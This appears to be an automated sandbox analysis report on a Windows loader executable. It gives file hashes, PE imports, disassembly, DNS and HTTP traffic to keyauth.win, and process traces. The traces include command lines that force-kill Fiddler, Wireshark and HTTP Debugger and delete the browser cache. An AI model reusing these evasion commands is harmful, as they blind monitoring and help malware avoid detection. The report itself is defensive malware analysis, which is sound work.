                                          SHA-256:38FBCBA8BBDA4D03A7300CC9BD6A4DC39AF039918D2F3A1D840D406FFE9B22F2
                                          SHA-512:AEC366B9754151827DD6384075C201A800087145449A45CC1F8F70AF5FEC85783EC805EF7E1BC35DDA5276DBE8606CF77A7C9E231EF2DB31702876E7CCEDEFF7
                                          Malicious:false
                                          Preview:MDMP..a..... ........U.g............$...............,............J..........T.......8...........T...........p'..Tu.......................!..............................................................................eJ......T"......Lw......................T.......P....U.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):10134
                                          Entropy (8bit):3.7158043317306677
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJiy/H6YEITcP45Yg+hgmfhQ2NprO89bqXzoSf6Om:R6lXJvP6YEsWgGgmfhQ23qXzVfK
                                          MD5:0E67A4CB40F73B6B89A9E80CC936151D
                                          SHA1:7DD557F53A3ABA49DCE5054FE8AB81773A8A55B2
                                          SHA-256:B6CD3D29AB7C4872387529C1EA7C8879099CF04D874F5D7076AE3491F8DAD63E
                                          SHA-512:0E1898EDC19C8E50AC38BC0C2F32E6869ECD079D43F5083F59F29AAF074AB3BD6E40FCD07A8E524F65F51B48B269C7D88E549AEBD1E159A83C248A77339A3914
                                          Malicious:false
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.4.0.<./.P.i.
                                          Process:C:\Windows\System32\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4645
                                          Entropy (8bit):4.476988878789837
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zs8Jg771I9adWpW8VY5Ym8M4J0/FBUmyq85zWXtYxmXeBd:uIjf6I75s7VhJ5mVicXMd
                                          MD5:041635DFB4262E437F867A3129EB6348
                                          SHA1:CE4941921E4C5676833862BBF63C57F9ED275F5A
                                          SHA-256:CF441C735C424C1A20456EA5A5CC41B6C678D3E1EE9CB3F7209B000B8452E2C6
                                          SHA-512:EE38F42B0E42BDD5BCE29F119AE157F2813D729A1969FBB4E6FE9D04CE4DF46E3346EF8A14AE00EE191FD673BC6675E551136151507B9DE32ADEF083414788E9
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="552132" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                          Process:C:\Windows\System32\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.421637273868838
                                          Encrypted:false
                                          SSDEEP:6144:jSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN70uhiTw:uvloTMW+EZMM6DFyd03w
                                          MD5:1A4F2ADD61F4F137162A34F03CED6C08
                                          SHA1:5723F4B227CA9AC218083AFE5685388CB35106FD
                                          SHA-256:FA19D4379AF2B1ADF627FE11EADF1FF66BD2DE54ADEA7CF6495C73A9805ED6E7
                                          SHA-512:CA49C921D9FD5F7FDD2F81F881B39E6310613341D8E8B45681B2F7118C44E905EA915BFEA556264EA9C2D5A8B580EF555E32B0484580BAE22E13E6EB80D2DD5F
                                          Malicious:false
                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....##..............................................................................................................................................................................................................................................................................................................................................o...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\cmd.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):44
                                          Entropy (8bit):4.003997527334849
                                          Encrypted:false
                                          SSDEEP:3:HnRthLK5a6eCMABe:HRoJPO
                                          MD5:DF5DC1ABC0D52F3C9E931E26A7C0065C
                                          SHA1:EE84123D3B3BC440C63DFE65FF5616BE2B0904D5
                                          SHA-256:F7167A2FACDE50428D8D2697A1CDFF075DE809323DD16D62B65CDD103B2A9A6D
                                          SHA-512:9B2253CE41880D22A2DDF4F886BB6CB22FF0C981400CD9D03A1FCA81DE5FAEB86C26B85B66ECEC960816D7BBE9740843890F2FCCD334B6D274295A32A8E6A4E9
                                          Malicious:false
                                          Preview:The system cannot find the file specified...
                                          File type:PE32+ executable (console) x86-64, for MS Windows
                                          Entropy (8bit):6.4231219861016315
                                          TrID:
                                          • Win64 Executable Console (202006/5) 92.65%
                                          • Win64 Executable (generic) (12005/4) 5.51%
                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                          • DOS Executable Generic (2002/1) 0.92%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:oMBUxRQ4cj.exe
                                          File size:506'368 bytes
                                          MD5:be1bc9129a29112cf1d62b178517de03
                                          SHA1:d93ce38e29d5643fdda4d786a0194fbed04c68b9
                                          SHA256:ff4475b9917de9cdd66f95df8f764433961e992a28942b595933ecf0a8c82db8
                                          SHA512:f28d9631d0d4f0ab5f648b4fd9913ddf1336c5b898513266456e9aeb81a69b3c339e6fa53b6af52e8edecc30f6971fc6ce4f66e97acb38149ea3a2deb168da4d
                                          SSDEEP:6144:xy8S4ZP3rneV8giiDYviaN4TuNy+m4W70Lzxw2T942uHde9VWWTpQmCgTf1:xDpVtfkYvi3qNRWYLz2m+P4m5mC6f1
                                          TLSH:96B46D56A7A807E9D1A7D03CC547C603E7B6B4991310DBDB43A0CA791F63BE16E3A720
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........V...V...V..._.+.B...PHE.^...PH..v...PH..\...PH..R...PH..P.......A...V...s.......?...9H..T...9H..W...9HG.W...9H..W...RichV..
                                          Icon Hash:00928e8e8686b000
                                          Entrypoint:0x14005f9d8
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x140000000
                                          Subsystem:windows cui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x670FD9F7 [Wed Oct 16 15:21:27 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:6
                                          OS Version Minor:0
                                          File Version Major:6
                                          File Version Minor:0
                                          Subsystem Version Major:6
                                          Subsystem Version Minor:0
                                          Import Hash:3dd1b7e6418973ac2798d88d33677d96
                                          Instruction
                                          dec eax
                                          sub esp, 28h
                                          call 00007FE81C900A58h
                                          dec eax
                                          add esp, 28h
                                          jmp 00007FE81C900347h
                                          int3
                                          int3
                                          jmp 00007FE81C900D08h
                                          int3
                                          int3
                                          int3
                                          inc eax
                                          push ebx
                                          dec eax
                                          sub esp, 20h
                                          dec eax
                                          mov ebx, ecx
                                          xor ecx, ecx
                                          call dword ptr [0000178Bh]
                                          dec eax
                                          mov ecx, ebx
                                          call dword ptr [000016F2h]
                                          call dword ptr [00001774h]
                                          dec eax
                                          mov ecx, eax
                                          mov edx, C0000409h
                                          dec eax
                                          add esp, 20h
                                          pop ebx
                                          dec eax
                                          jmp dword ptr [00001770h]
                                          dec eax
                                          mov dword ptr [esp+08h], ecx
                                          dec eax
                                          sub esp, 38h
                                          mov ecx, 00000017h
                                          call dword ptr [00001764h]
                                          test eax, eax
                                          je 00007FE81C9004D9h
                                          mov ecx, 00000002h
                                          int 29h
                                          dec eax
                                          lea ecx, dword ptr [00018E12h]
                                          call 00007FE81C90069Eh
                                          dec eax
                                          mov eax, dword ptr [esp+38h]
                                          dec eax
                                          mov dword ptr [00018EF9h], eax
                                          dec eax
                                          lea eax, dword ptr [esp+38h]
                                          dec eax
                                          add eax, 08h
                                          dec eax
                                          mov dword ptr [00018E89h], eax
                                          dec eax
                                          mov eax, dword ptr [00018EE2h]
                                          dec eax
                                          mov dword ptr [00018D53h], eax
                                          dec eax
                                          mov eax, dword ptr [esp+40h]
                                          dec eax
                                          mov dword ptr [00018E57h], eax
                                          mov dword ptr [00018D2Dh], C0000409h
                                          mov dword ptr [00018D27h], 00000001h
                                          mov dword ptr [00000031h], 00000000h
                                          Programming Language:
                                          • [IMP] VS2008 SP1 build 30729
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x760f00x1cc.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x7d0000x1e8.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x790000x3f84.pdata
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x7e0000x4e4.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x6ffc00x70.rdata
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x700800x28.rdata
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6fe800x140.rdata
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x610000x818.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x5fda80x5fe00e7d9058d6d0aa09d44a484d3d7e87298False0.5327243929269883data6.33613026455228IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x610000x16b920x16c00fe643e4dd3fa906f1244164bcbf97042False0.37974330357142855data5.577966141982146IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x780000xdf80x400227ce6cadd4904b7716198186655da5cFalse0.2138671875data2.4411408781631465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .pdata0x790000x3f840x400050e902fb009b515c9924ff6238b5e51dFalse0.48175048828125data5.776998787420237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc0x7d0000x1e80x2007d03a0f9d3c3a10dec18b513161e66d8False0.54296875data4.772037401703051IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x7e0000x4e40x60039326fb49822ad82593e9e49b5e608b8False0.5123697916666666data4.849267575521713IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_MANIFEST0x7d0600x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                          DLLImport
                                          KERNEL32.dllWideCharToMultiByte, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, GetTickCount, QueryPerformanceCounter, VerifyVersionInfoA, LoadLibraryA, GetProcAddress, GetModuleHandleA, FreeLibrary, GetSystemDirectoryA, CreateFileA, VerSetConditionMask, SleepEx, LeaveCriticalSection, EnterCriticalSection, FormatMessageA, SetLastError, CloseHandle, GetCurrentProcess, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetModuleHandleW, GetCurrentProcessId, GetCurrentThreadId, GetFileSizeEx, WaitForMultipleObjects, PeekNamedPipe, ReadFile, GetFileType, GetEnvironmentVariableA, MultiByteToWideChar, WaitForSingleObjectEx, QueryPerformanceFrequency, GetSystemTimeAsFileTime, MoveFileExA, DeleteCriticalSection, GetLastError, InitializeCriticalSectionEx, OutputDebugStringW, InitializeSListHead, GetConsoleWindow, SetConsoleTitleA, SetConsoleTextAttribute, Sleep, GetStdHandle
                                          USER32.dllGetWindowLongPtrA, SetWindowLongPtrA, MessageBoxA, SetLayeredWindowAttributes
                                          ADVAPI32.dllCryptAcquireContextA, CryptReleaseContext, CryptGetHashParam, CryptGenRandom, CryptCreateHash, CryptHashData, CryptDestroyHash, CryptDestroyKey, CryptImportKey, CryptEncrypt
                                          SHELL32.dllShellExecuteA
                                          MSVCP140.dll?_Xlength_error@std@@YAXPEBD@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z, ?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?uncaught_exception@std@@YA_NXZ, ?_Xbad_function_call@std@@YAXXZ, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z
                                          urlmon.dllURLDownloadToFileA
                                          Normaliz.dllIdnToAscii
                                          WLDAP32.dll
                                          CRYPT32.dllCertGetCertificateChain, CertFreeCertificateChainEngine, CertCreateCertificateChainEngine, CryptQueryObject, CertGetNameStringA, CertFindExtension, CertAddCertificateContextToStore, CertFreeCertificateChain, PFXImportCertStore, CryptStringToBinaryA, CertFreeCertificateContext, CertFindCertificateInStore, CertEnumCertificatesInStore, CertCloseStore, CertOpenStore, CryptDecodeObjectEx
                                          WS2_32.dllgethostname, sendto, recvfrom, freeaddrinfo, getaddrinfo, select, ioctlsocket, listen, htonl, accept, WSACleanup, WSAStartup, WSAIoctl, WSASetLastError, socket, setsockopt, ntohs, htons, getsockopt, getsockname, getpeername, connect, bind, WSAGetLastError, send, recv, closesocket, ntohl, __WSAFDIsSet
                                          VCRUNTIME140.dll__std_exception_copy, __std_exception_destroy, _CxxThrowException, memcpy, memset, __std_terminate, __C_specific_handler, __current_exception_context, __current_exception, memchr, memcmp, strchr, strstr, memmove, strrchr
                                          VCRUNTIME140_1.dll__CxxFrameHandler4
                                          api-ms-win-crt-runtime-l1-1-0.dll_invalid_parameter_noinfo_noreturn, _beginthreadex, _errno, __sys_nerr, _getpid, exit, system, terminate, _register_thread_local_exe_atexit_callback, _configure_narrow_argv, _initialize_narrow_environment, _initialize_onexit_table, _register_onexit_function, _crt_atexit, _cexit, _seh_filter_exe, _set_app_type, strerror, _c_exit, _initterm, _initterm_e, _exit, __p___argv, __p___argc, _get_initial_narrow_environment
                                          api-ms-win-crt-heap-l1-1-0.dllrealloc, _callnewh, free, calloc, _set_new_mode, malloc
                                          api-ms-win-crt-utility-l1-1-0.dllrand, qsort
                                          api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vfprintf, fseek, feof, __p__commode, __acrt_iob_func, ftell, fputc, _lseeki64, _read, _write, _close, _open, fflush, __stdio_common_vsscanf, __stdio_common_vsprintf, fread, fputs, fopen, fwrite, fgets, fclose, _set_fmode
                                          api-ms-win-crt-convert-l1-1-0.dllstrtod, atoi, strtoul, strtoull, strtol, strtoll
                                          api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale, localeconv
                                          api-ms-win-crt-time-l1-1-0.dll_time64, _gmtime64
                                          api-ms-win-crt-string-l1-1-0.dllstrcmp, strncmp, isupper, strcspn, strspn, _strdup, strncpy, tolower, strpbrk
                                          api-ms-win-crt-filesystem-l1-1-0.dll_stat64, _unlink, _access, _fstat64
                                          api-ms-win-crt-math-l1-1-0.dll__setusermatherr, _dclass
                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 20, 2024 21:10:02.040790081 CEST49708443192.168.2.5104.26.0.5
                                          Oct 20, 2024 21:10:02.040867090 CEST44349708104.26.0.5192.168.2.5
                                          Oct 20, 2024 21:10:02.040980101 CEST49708443192.168.2.5104.26.0.5
                                          Oct 20, 2024 21:10:02.054287910 CEST49708443192.168.2.5104.26.0.5
                                          Oct 20, 2024 21:10:02.054323912 CEST44349708104.26.0.5192.168.2.5
                                          Oct 20, 2024 21:10:02.871313095 CEST44349708104.26.0.5192.168.2.5
                                          Oct 20, 2024 21:10:02.871520996 CEST49708443192.168.2.5104.26.0.5
                                          Oct 20, 2024 21:10:02.937979937 CEST49708443192.168.2.5104.26.0.5
                                          Oct 20, 2024 21:10:02.938029051 CEST44349708104.26.0.5192.168.2.5
                                          Oct 20, 2024 21:10:02.938487053 CEST44349708104.26.0.5192.168.2.5
                                          Oct 20, 2024 21:10:02.942677975 CEST49708443192.168.2.5104.26.0.5
                                          Oct 20, 2024 21:10:02.983427048 CEST44349708104.26.0.5192.168.2.5
                                          Oct 20, 2024 21:10:03.128381014 CEST44349708104.26.0.5192.168.2.5
                                          Oct 20, 2024 21:10:03.128540993 CEST44349708104.26.0.5192.168.2.5
                                          Oct 20, 2024 21:10:03.128626108 CEST49708443192.168.2.5104.26.0.5
                                          Oct 20, 2024 21:10:26.469109058 CEST49708443192.168.2.5104.26.0.5
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 20, 2024 21:10:02.027272940 CEST5268753192.168.2.51.1.1.1
                                          Oct 20, 2024 21:10:02.034897089 CEST53526871.1.1.1192.168.2.5
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Oct 20, 2024 21:10:02.027272940 CEST192.168.2.51.1.1.10xec0aStandard query (0)keyauth.winA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Oct 20, 2024 21:10:02.034897089 CEST1.1.1.1192.168.2.50xec0aNo error (0)keyauth.win104.26.0.5A (IP address)IN (0x0001)false
                                          Oct 20, 2024 21:10:02.034897089 CEST1.1.1.1192.168.2.50xec0aNo error (0)keyauth.win172.67.72.57A (IP address)IN (0x0001)false
                                          Oct 20, 2024 21:10:02.034897089 CEST1.1.1.1192.168.2.50xec0aNo error (0)keyauth.win104.26.1.5A (IP address)IN (0x0001)false
                                          • keyauth.win
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549708104.26.0.54432640C:\Users\user\Desktop\oMBUxRQ4cj.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-20 19:10:02 UTC128OUTPOST /api/1.1/ HTTP/1.1
                                          Host: keyauth.win
                                          Accept: */*
                                          Content-Length: 58
                                          Content-Type: application/x-www-form-urlencoded
                                          2024-10-20 19:10:02 UTC58OUTData Raw: 74 79 70 65 3d 69 6e 69 74 26 76 65 72 3d 38 2e 31 26 6e 61 6d 65 3d 6c 6f 61 64 65 72 20 70 72 69 6e 63 69 70 61 6c 26 6f 77 6e 65 72 69 64 3d 39 57 49 76 54 56 4a 61 39 6d
                                          Data Ascii: type=init&ver=8.1&name=loader principal&ownerid=9WIvTVJa9m


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:15:09:59
                                          Start date:20/10/2024
                                          Path:C:\Users\user\Desktop\oMBUxRQ4cj.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\oMBUxRQ4cj.exe"
                                          Imagebase:0x7ff7e59e0000
                                          File size:506'368 bytes
                                          MD5 hash:BE1BC9129A29112CF1D62B178517DE03
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:1
                                          Start time:15:09:59
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:2
                                          Start time:15:10:00
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:15:10:00
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\taskkill.exe
                                          Wow64 process (32bit):false
                                          Commandline:taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                          Imagebase:0x7ff6130f0000
                                          File size:101'376 bytes
                                          MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:4
                                          Start time:15:10:00
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:15:10:00
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\taskkill.exe
                                          Wow64 process (32bit):false
                                          Commandline:taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
                                          Imagebase:0x7ff6130f0000
                                          File size:101'376 bytes
                                          MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:7
                                          Start time:15:10:00
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:15:10:00
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\taskkill.exe
                                          Wow64 process (32bit):false
                                          Commandline:taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                          Imagebase:0x7ff6130f0000
                                          File size:101'376 bytes
                                          MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:9
                                          Start time:15:10:00
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:10
                                          Start time:15:10:00
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc stop HTTPDebuggerPro
                                          Imagebase:0x7ff656ab0000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:11
                                          Start time:15:10:00
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:12
                                          Start time:15:10:00
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc stop HTTPDebuggerProSdk
                                          Imagebase:0x7ff656ab0000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:13
                                          Start time:15:10:00
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:14
                                          Start time:15:10:00
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:15
                                          Start time:15:10:00
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\taskkill.exe
                                          Wow64 process (32bit):false
                                          Commandline:taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                          Imagebase:0x7ff6130f0000
